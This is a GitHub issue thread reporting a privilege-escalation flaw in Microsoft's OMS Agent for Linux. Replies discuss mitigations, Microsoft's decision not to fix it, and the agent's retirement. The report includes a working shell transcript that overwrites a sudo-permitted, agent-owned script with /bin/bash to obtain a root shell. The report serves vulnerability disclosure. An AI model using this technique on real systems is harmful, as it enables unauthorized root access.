### ISSUE TITLE
Unintended privileged escalation 

### ISSUE THREAD

**Issue by rso-support** [microsoft/OMS-Agent-for-Linux#1022]
The commands outlined in /etc/sudoers.d/omsagent (created by the installer) allow for unintended privilege escalation. 

Cause:
This commands listed in sudoers are owned by 'omsagent'. This allows 'omsagent' to write/replace those commands outlined in sudoers with arbitrary commands. 

`[root@redacted~]# grep '/opt/microsoft/omsconfig/Scripts/OMSRsyslog.post.sh' /etc/sudoers.d/omsagent
omsagent ALL=(ALL) NOPASSWD: /opt/microsoft/omsconfig/Scripts/OMSRsyslog.post.sh
[root@redacted~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@redacted~]# grep '/opt/microsoft/omsconfig/Scripts/OMSRsyslog.post.sh' /etc/sudoers.d/omsagent
omsagent ALL=(ALL) NOPASSWD: /opt/microsoft/omsconfig/Scripts/OMSRsyslog.post.sh
[root@redacted~]# su - omsagent
Last login: Wed Aug 14 17:11:39 UTC 2019 on pts/0
-bash-4.2$ id
uid=991(omsagent) gid=982(omiusers) groups=982(omiusers) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
-bash-4.2$ cp /opt/microsoft/omsconfig/Scripts/OMSRsyslog.post.sh{,.bak}

-bash-4.2$ cp /bin/bash /opt/microsoft/omsconfig/Scripts/OMSRsyslog.post.sh

-bash-4.2$ sudo /opt/microsoft/omsconfig/Scripts/OMSRsyslog.post.sh

[root@redacted]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023`

**Comment by edneville** [comment]
You could chown the files to root, if you wish, but it would break self updating.

I think a way forward may be to do the update check from root's cron.

**Comment by twem** [comment]
It took a couple of months but we got an answer from premier support, they are not going to change OMS. They have promised it will be support in the next generation agent "Azure Monitor agent"
They have updated the official docs to say CIS is not supported
https://docs.microsoft.com/en-us/azure/azure-monitor/agents/agent-linux#supported-linux-hardening

**Comment by hestolz** [comment]
Thank you for your submission. As [previously announced](https://azure.microsoft.com/en-us/updates/were-retiring-the-log-analytics-agent-in-azure-monitor-on-31-august-2024/), the Log Analytics agent has been **deprecatated** and has no support as of **August 31, 2024.** If you use the Log Analytics agent to ingest data to Azure Monitor, [migrate now to the new Azure Monitor agent](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/azure-monitor-agent-migration). As part of repo archival, open issues and pull requests will be closed.
